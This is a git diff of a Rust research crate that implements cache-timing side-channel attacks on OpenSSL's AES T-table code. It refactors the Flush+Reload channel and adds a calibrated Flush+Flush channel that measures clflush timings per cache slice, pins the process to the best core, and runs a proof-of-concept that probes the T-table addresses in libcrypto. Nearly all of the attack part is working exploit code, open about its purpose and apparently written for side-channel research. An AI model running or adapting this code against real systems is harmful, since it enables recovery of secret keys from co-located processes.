diff --git a/aes-t-tables/src/lib.rs b/aes-t-tables/src/lib.rs index be42562..c14a07c 100644 --- a/aes-t-tables/src/lib.rs +++ b/aes-t-tables/src/lib.rs @@ -2,7 +2,7 @@ use openssl::aes; -use crate::CacheStatus::{Hit, Miss}; +use crate::CacheStatus::Miss; use memmap2::Mmap; use openssl::aes::aes_ige; use openssl::symm::Mode; @@ -10,8 +10,8 @@ use std::collections::HashMap; use std::fmt::Debug; use std::fs::File; use std::path::Path; -use std::sync::Arc; +pub mod naive_flush_and_reload; // Generic AES T-table attack flow // Modularisation : @@ -33,12 +33,13 @@ use std::sync::Arc; // an attacker measurement // a calibration victim -#[derive(Debug, PartialEq, Eq)] +#[derive(Debug, PartialEq, Eq, Clone, Copy)] pub enum CacheStatus { Hit, Miss, } +#[derive(Debug, PartialEq, Eq, Clone, Copy)] pub enum ChannelFatalError { Oops, } @@ -46,7 +47,8 @@ pub enum ChannelFatalError { pub enum SideChannelError { NeedRecalibration, FatalError(ChannelFatalError), - AddressNotReady, + AddressNotReady(*const u8), + AddressNotCalibrated(*const u8), } /* @@ -64,7 +66,10 @@ pub trait SimpleCacheSideChannel { pub trait TableCacheSideChannel { //type ChannelFatalError: Debug; - fn calibrate(&mut self, addresses: impl IntoIterator + Clone); + fn calibrate( + &mut self, + addresses: impl IntoIterator + Clone, + ) -> Result<(), ChannelFatalError>; fn attack<'a, 'b, 'c>( &'a mut self, addresses: impl IntoIterator + Clone, @@ -75,10 +80,10 @@ pub trait TableCacheSideChannel { pub trait SingleAddrCacheSideChannel: Debug { //type SingleChannelFatalError: Debug; - fn test(&mut self, addr: *const u8) -> Result; - fn prepare(&mut self, addr: *const u8); - fn victim(&mut self, operation: &dyn Fn()); - fn calibrate( + fn test_single(&mut self, addr: *const u8) -> Result; + fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError>; + fn victim_single(&mut self, operation: &dyn Fn()); + fn calibrate_single( &mut self, addresses: impl IntoIterator + Clone, ) -> Result<(), ChannelFatalError>; @@ -91,7 +96,10 @@ pub trait MultipleAddrCacheSideChannel: Debug { &mut self, addresses: impl IntoIterator + Clone, ) -> Result, SideChannelError>; - fn prepare(&mut self, addresses: impl IntoIterator + Clone); + fn prepare( + &mut self, + addresses: impl IntoIterator + Clone, + ) -> Result<(), SideChannelError>; fn victim(&mut self, operation: &dyn Fn()); fn calibrate( &mut self, @@ -100,8 +108,11 @@ pub trait MultipleAddrCacheSideChannel: Debug { } impl TableCacheSideChannel for T { - default fn calibrate(&mut self, addresses: impl IntoIterator + Clone) { - self.calibrate(addresses); + default fn calibrate( + &mut self, + addresses: impl IntoIterator + Clone, + ) -> Result<(), ChannelFatalError> { + self.calibrate_single(addresses) } //type ChannelFatalError = T::SingleChannelFatalError; @@ -113,9 +124,17 @@ impl TableCacheSideChannel for T { let mut result = Vec::new(); for addr in addresses { - self.prepare(addr); - self.victim(victim); - let r = self.test(addr); + match self.prepare_single(addr) { + Ok(_) => {} + Err(e) => match e { + SideChannelError::NeedRecalibration => unimplemented!(), + SideChannelError::FatalError(e) => return Err(e), + SideChannelError::AddressNotReady(_addr) => panic!(), + SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(), + }, + } + self.victim_single(victim); + let r = self.test_single(addr); match r { Ok(status) => { result.push((addr, status)); @@ -133,21 +152,25 @@ impl TableCacheSideChannel for T { } } +// TODO + impl SingleAddrCacheSideChannel for T { //type SingleChannelFatalError = T::MultipleChannelFatalError; - fn test(&mut self, addr: *const u8) -> Result { - unimplemented!() + fn test_single(&mut self, addr: *const u8) -> Result { + let addresses = vec![addr]; + self.test(addresses).map(|v| v[0].1) } - fn prepare(&mut self, addr: *const u8) { - unimplemented!() + fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> { + let addresses = vec![addr]; + self.prepare(addresses) } - fn victim(&mut self, operation: &dyn Fn()) { - unimplemented!() + fn victim_single(&mut self, operation: &dyn Fn()) { + self.victim(operation); } - fn calibrate( + fn calibrate_single( &mut self, addresses: impl IntoIterator + Clone, ) -> Result<(), ChannelFatalError> { @@ -156,8 +179,11 @@ impl SingleAddrCacheSideChannel for T { } impl TableCacheSideChannel for T { - fn calibrate(&mut self, addresses: impl IntoIterator + Clone) { - self.calibrate(addresses); + fn calibrate( + &mut self, + addresses: impl IntoIterator + Clone, + ) -> Result<(), ChannelFatalError> { + self.calibrate(addresses) } //type ChannelFatalError = T::MultipleChannelFatalError; @@ -166,8 +192,17 @@ impl TableCacheSideChannel for T { addresses: impl IntoIterator + Clone, victim: &'c dyn Fn(), ) -> Result, ChannelFatalError> { - MultipleAddrCacheSideChannel::prepare(self, addresses.clone()); + match MultipleAddrCacheSideChannel::prepare(self, addresses.clone()) { + Ok(_) => {} + Err(e) => match e { + SideChannelError::NeedRecalibration => unimplemented!(), + SideChannelError::FatalError(e) => return Err(e), + SideChannelError::AddressNotReady(_addr) => panic!(), + SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(), + }, + } MultipleAddrCacheSideChannel::victim(self, victim); + let r = MultipleAddrCacheSideChannel::test(self, addresses); // Fixme error handling match r { Err(e) => match e { @@ -189,8 +224,6 @@ pub struct AESTTableParams<'a> { pub te: [isize; 4], } -const LEN: usize = (u8::max_value() as usize) + 1; - pub fn attack_t_tables_poc( side_channel: &mut impl TableCacheSideChannel, parameters: AESTTableParams, @@ -222,7 +255,7 @@ pub fn attack_t_tables_poc( .flatten() .map(|offset| unsafe { base.offset(offset) }); - side_channel.calibrate(addresses.clone()); + side_channel.calibrate(addresses.clone()).unwrap(); for addr in addresses.clone() { let mut timing = HashMap::new(); @@ -247,11 +280,25 @@ pub fn attack_t_tables_poc( let mut result = [0u8; 16]; aes_ige(&plaintext, &mut result, &key_struct, &mut iv, Mode::Encrypt); }; - for i in 0..parameters.num_encryptions { + + for _ in 0..100 { + let r = side_channel.attack(addresses.clone(), &victim); + match r { + Ok(v) => { + for (probe, status) in v { + if status == Miss { + *timings.get_mut(&probe).unwrap().entry(b).or_insert(0) += 0; + } + } + } + Err(_) => panic!("Attack failed"), + } + } + + for _ in 0..parameters.num_encryptions { let r = side_channel.attack(addresses.clone(), &victim); match r { Ok(v) => { - //println!("{:?}", v) for (probe, status) in v { if status == Miss { *timings.get_mut(&probe).unwrap().entry(b).or_insert(0) += 1; @@ -265,7 +312,7 @@ pub fn attack_t_tables_poc( for probe in addresses { print!("{:p}", probe); for b in (u8::min_value()..=u8::max_value()).step_by(16) { - print!(" {:3}", timings[&probe][&b]); + print!(" {:4}", timings[&probe][&b]); } println!(); } diff --git a/aes-t-tables/src/main.rs b/aes-t-tables/src/main.rs index a65a7e8..f44b779 100644 --- a/aes-t-tables/src/main.rs +++ b/aes-t-tables/src/main.rs @@ -1,70 +1,389 @@ +use aes_t_tables::SideChannelError::{AddressNotCalibrated, AddressNotReady}; use aes_t_tables::{ - attack_t_tables_poc, AESTTableParams, CacheStatus, ChannelFatalError, SideChannelError, - SingleAddrCacheSideChannel, + attack_t_tables_poc, AESTTableParams, CacheStatus, ChannelFatalError, + MultipleAddrCacheSideChannel, SideChannelError, }; -use cache_utils::calibration::only_reload; -use cache_utils::{flush, rdtsc_fence}; +use cache_utils::calibration::{ + get_cache_slicing, only_flush, CalibrateOperation2T, CalibrationOptions, HistParams, Verbosity, + CFLUSH_BUCKET_NUMBER, CFLUSH_BUCKET_SIZE, CFLUSH_NUM_ITER, +}; +use cache_utils::{find_core_per_socket, flush, maccess, noop}; use std::collections::{HashMap, HashSet}; use std::path::Path; -#[derive(Debug)] -struct NaiveFlushAndReload { - pub threshold: u64, - current: Option<*const u8>, -} - -impl NaiveFlushAndReload { - fn from_threshold(threshold: u64) -> Self { - NaiveFlushAndReload { - threshold, - current: None, - } - } -} - -impl SingleAddrCacheSideChannel for NaiveFlushAndReload { - fn test(&mut self, addr: *const u8) -> Result { - if self.current != Some(addr) { - panic!(); // FIXME - } - let t = unsafe { only_reload(addr) }; - if t > self.threshold { - Ok(CacheStatus::Miss) - } else { - Ok(CacheStatus::Hit) - } - } - - fn victim(&mut self, operation: &dyn Fn()) { - operation() - } - - fn calibrate( - &mut self, - _addresses: impl IntoIterator, - ) -> Result<(), ChannelFatalError> { - Ok(()) - } - - fn prepare(&mut self, addr: *const u8) { - unsafe { flush(addr) }; - self.current = Some(addr); - } -} +use aes_t_tables::naive_flush_and_reload::*; type VPN = usize; type Slice = u8; -struct FlushAndFlush { - thresholds: HashMap>, - addresses_ready: HashSet<*const u8>, +use cache_utils::calibration::calibrate_fixed_freq_2_thread; +use cache_utils::complex_addressing::CacheSlicing; +use core::fmt; +use nix::sched::{sched_getaffinity, sched_setaffinity, CpuSet}; +use nix::unistd::Pid; +use std::fmt::{Debug, Formatter}; // TODO + +#[derive(Debug)] +struct Threshold { + pub value: u64, + pub miss_faster_than_hit: bool, } -impl FlushAndFlush {} +impl Threshold { + pub fn is_hit(&self, time: u64) -> bool { + self.miss_faster_than_hit && time >= self.value + || !self.miss_faster_than_hit && time < self.value + } +} + +struct FlushAndFlush { + thresholds: HashMap>, + addresses_ready: HashSet<*const u8>, + slicing: CacheSlicing, +} + +// Current issue : hash function trips borrow checker. +// Also need to finish implementing the calibration logic + +impl FlushAndFlush { + pub fn new() -> Option { + if let Some(slicing) = get_cache_slicing(find_core_per_socket()) { + if !slicing.can_hash() { + return None; + } + + let ret = Self { + thresholds: Default::default(), + addresses_ready: Default::default(), + slicing, + }; + Some(ret) + } else { + None + } + } + + fn get_slice(&self, addr: *const u8) -> Slice { + self.slicing.hash(addr as usize).unwrap() + } +} + +impl Debug for FlushAndFlush { + fn fmt(&self, f: &mut Formatter<'_>) -> fmt::Result { + f.debug_struct("FlushAndFlush") + .field("thresholds", &self.thresholds) + .field("addresses_ready", &self.addresses_ready) + .field("slicing", &self.slicing) + .finish() + } +} + +const PAGE_LEN: usize = 1 << 12; + +fn get_vpn(p: *const T) -> usize { + (p as usize) & (!(PAGE_LEN - 1)) // FIXME +} + +fn cum_sum(vector: &Vec) -> Vec { + let len = vector.len(); + let mut res = vec![0; len]; + res[0] = vector[0]; + for i in 1..len { + res[i] = res[i - 1] + vector[i]; + } + assert_eq!(len, res.len()); + assert_eq!(len, vector.len()); + res +} + +impl MultipleAddrCacheSideChannel for FlushAndFlush { + fn test( + &mut self, + addresses: impl IntoIterator + Clone, // Fixme : This API should probably be unsafe to call + ) -> Result, SideChannelError> { + let mut result = Vec::new(); + let mut tmp = Vec::new(); + for addr in addresses { + let t = unsafe { only_flush(addr) }; + tmp.push((addr, t)); + } + for (addr, time) in tmp { + if !self.addresses_ready.contains(&addr) { + return Err(AddressNotReady(addr)); + } + let vpn: VPN = (addr as usize) & (!0xfff); // FIXME + let slice = self.get_slice(addr); + let threshold = &self.thresholds[&vpn][&slice]; + // refactor this into a struct threshold method ? + if threshold.is_hit(time) { + result.push((addr, CacheStatus::Hit)) + } else { + result.push((addr, CacheStatus::Miss)) + } + } + Ok(result) + } + + fn prepare( + &mut self, + addresses: impl IntoIterator + Clone, + ) -> Result<(), SideChannelError> { + use core::arch::x86_64 as arch_x86; + for addr in addresses.clone() { + let vpn: VPN = get_vpn(addr); + let slice = self.get_slice(addr); + if self.addresses_ready.contains(&addr) { + continue; + } + if !self.thresholds.contains_key(&vpn) || !self.thresholds[&vpn].contains_key(&slice) { + return Err(AddressNotCalibrated(addr)); + } + } + for addr in addresses { + unsafe { flush(addr) }; + self.addresses_ready.insert(addr); + } + unsafe { arch_x86::_mm_mfence() }; + Ok(()) + } + + fn victim(&mut self, operation: &dyn Fn()) { + operation(); // TODO use a different helper core ? + } + + fn calibrate( + &mut self, + addresses: impl IntoIterator + Clone, + ) -> Result<(), ChannelFatalError> { + let mut pages = HashMap::>::new(); + for addr in addresses { + let page = get_vpn(addr); + pages.entry(page).or_insert(HashSet::new()).insert(addr); + } + + let core_per_socket = find_core_per_socket(); + + let operations = [ + CalibrateOperation2T { + prepare: maccess::, + op: only_flush, + name: "clflush_remote_hit", + display_name: "clflush remote hit", + }, + CalibrateOperation2T { + prepare: noop::, + op: only_flush, + name: "clflush_miss", + display_name: "clflush miss", + }, + ]; + const HIT_INDEX: usize = 0; + const MISS_INDEX: usize = 1; + + // Generate core iterator + let mut core_pairs: Vec<(usize, usize)> = Vec::new(); + + let old = sched_getaffinity(Pid::from_raw(0)).unwrap(); + + for i in 0..CpuSet::count() { + if old.is_set(i).unwrap() { + core_pairs.push((i, i)); + } + } + + // Probably needs more metadata + let mut per_core: HashMap>> = + HashMap::new(); + + let mut core_averages: HashMap = HashMap::new(); + + for (page, _) in pages { + let p = page as *const u8; + let r = unsafe { + calibrate_fixed_freq_2_thread( + p, + 64, // FIXME : MAGIC + PAGE_LEN as isize, // MAGIC + &mut core_pairs.clone().into_iter(), + &operations, + CalibrationOptions { + hist_params: HistParams { + bucket_number: CFLUSH_BUCKET_NUMBER, + bucket_size: CFLUSH_BUCKET_SIZE, + iterations: CFLUSH_NUM_ITER << 1, + }, + verbosity: Verbosity::NoOutput, + optimised_addresses: true, + }, + core_per_socket, + ) + }; + + /* TODO refactor a good chunk of calibration result analysis to make thresholds in a separate function + Generating Cumulative Sums and then using that to compute error count for each possible threshold is a recurring joke. + It might be worth in a second time to refactor this to handle more generic strategies (such as double thresholds) + What about handling non attributes values (time values that are not attributed as hit or miss) + */ + + for result2t in r { + if result2t.main_core != result2t.helper_core { + panic!("Unexpected core numbers"); + } + let core = result2t.main_core; + match result2t.res { + Err(e) => panic!("Oops: {:#?}", e), + Ok(results_1t) => { + for r1t in results_1t { + let offset = r1t.offset; + let addr = unsafe { p.offset(offset) }; + let slice = self.get_slice(addr); + let miss_hist = &r1t.histogram[MISS_INDEX]; + let hit_hist = &r1t.histogram[HIT_INDEX]; + if miss_hist.len() != hit_hist.len() { + panic!("Maformed results"); + } + let len = miss_hist.len(); + let miss_cum_sum = cum_sum(miss_hist); + let hit_cum_sum = cum_sum(hit_hist); + let miss_total = miss_cum_sum[len - 1]; + let hit_total = hit_cum_sum[len - 1]; + + // Threshold is less than equal => miss, strictly greater than => hit + let mut error_miss_less_than_hit = vec![0; len - 1]; + // Threshold is less than equal => hit, strictly greater than => miss + let mut error_hit_less_than_miss = vec![0; len - 1]; + + let mut min_error_hlm = u32::max_value(); + let mut min_error_mlh = u32::max_value(); + + for i in 0..(len - 1) { + error_hit_less_than_miss[i] = + miss_cum_sum[i] + (hit_total - hit_cum_sum[i]); + error_miss_less_than_hit[i] = + hit_cum_sum[i] + (miss_total - miss_cum_sum[i]); + + if error_hit_less_than_miss[i] < min_error_hlm { + min_error_hlm = error_hit_less_than_miss[i]; + } + if error_miss_less_than_hit[i] < min_error_mlh { + min_error_mlh = error_miss_less_than_hit[i]; + } + } + + let hlm = min_error_hlm < min_error_mlh; + + let (errors, min_error) = if hlm { + (&error_hit_less_than_miss, min_error_hlm) + } else { + (&error_miss_less_than_hit, min_error_mlh) + }; + + let mut potential_thresholds = Vec::new(); + + for i in 0..errors.len() { + if errors[i] == min_error { + let num_true_hit; + let num_false_hit; + let num_true_miss; + let num_false_miss; + if hlm { + num_true_hit = hit_cum_sum[i]; + num_false_hit = miss_cum_sum[i]; + num_true_miss = miss_total - num_false_hit; + num_false_miss = hit_total - num_true_hit; + } else { + num_true_miss = miss_cum_sum[i]; + num_false_miss = hit_cum_sum[i]; + num_true_hit = hit_total - num_false_miss; + num_false_hit = miss_total - num_true_miss; + } + potential_thresholds.push(( + i, + num_true_hit, + num_false_hit, + num_true_miss, + num_false_miss, + min_error as f32 / (hit_total + miss_total) as f32, + )); + } + } + + let index = (potential_thresholds.len() - 1) / 2; + let (threshold, _, _, _, _, error_rate) = potential_thresholds[index]; + // insert in per_core + if per_core + .entry(core) + .or_insert(HashMap::new()) + .entry(page) + .or_insert(HashMap::new()) + .insert( + slice, + ( + Threshold { + value: threshold as u64, // FIXME the bucket to time conversion + miss_faster_than_hit: !hlm, + }, + error_rate, + ), + ) + .is_some() + { + panic!("Duplicate slice result"); + } + let core_average = core_averages.get(&core).unwrap_or(&(0.0, 0)); + let new_core_average = + (core_average.0 + error_rate, core_average.1 + 1); + core_averages.insert(core, new_core_average); + } + } + } + } + } + + // We now have a HashMap associating stuffs to cores, iterate on it and select the best. + let mut best_core = 0; + + let mut best_error_rate = { + let ca = core_averages[&0]; + ca.0 / ca.1 as f32 + }; + for (core, average) in core_averages { + let error_rate = average.0 / average.1 as f32; + if error_rate < best_error_rate { + best_core = core; + best_error_rate = error_rate; + } + } + let mut thresholds = HashMap::new(); + println!("Best core: {}, rate: {}", best_core, best_error_rate); + let tmp = per_core.remove(&best_core).unwrap(); + for (page, per_page) in tmp { + let page_entry = thresholds.entry(page).or_insert(HashMap::new()); + for (slice, per_slice) in per_page { + println!( + "page: {:x}, slice: {}, threshold: {:?}, error_rate: {}", + page, slice, per_slice.0, per_slice.1 + ); + page_entry.insert(slice, per_slice.0); + } + } + self.thresholds = thresholds; + println!("{:#?}", self.thresholds); + + // TODO handle error better for affinity setting and other issues. + + self.addresses_ready.clear(); + + let mut cpuset = CpuSet::new(); + cpuset.set(best_core).unwrap(); + sched_setaffinity(Pid::from_raw(0), &cpuset).unwrap(); + Ok(()) + } +} fn main() { let open_sslpath = Path::new(env!("OPENSSL_DIR")).join("lib/libcrypto.so"); - let mut side_channel = NaiveFlushAndReload::from_threshold(200); + let mut side_channel = NaiveFlushAndReload::from_threshold(220); attack_t_tables_poc( &mut side_channel, AESTTableParams { @@ -74,4 +393,14 @@ fn main() { openssl_path: &open_sslpath, }, ); + let mut side_channel_ff = FlushAndFlush::new().unwrap(); + attack_t_tables_poc( + &mut side_channel_ff, + AESTTableParams { + num_encryptions: 1 << 15, + key: [0; 32], + te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order) + openssl_path: &open_sslpath, + }, + ); }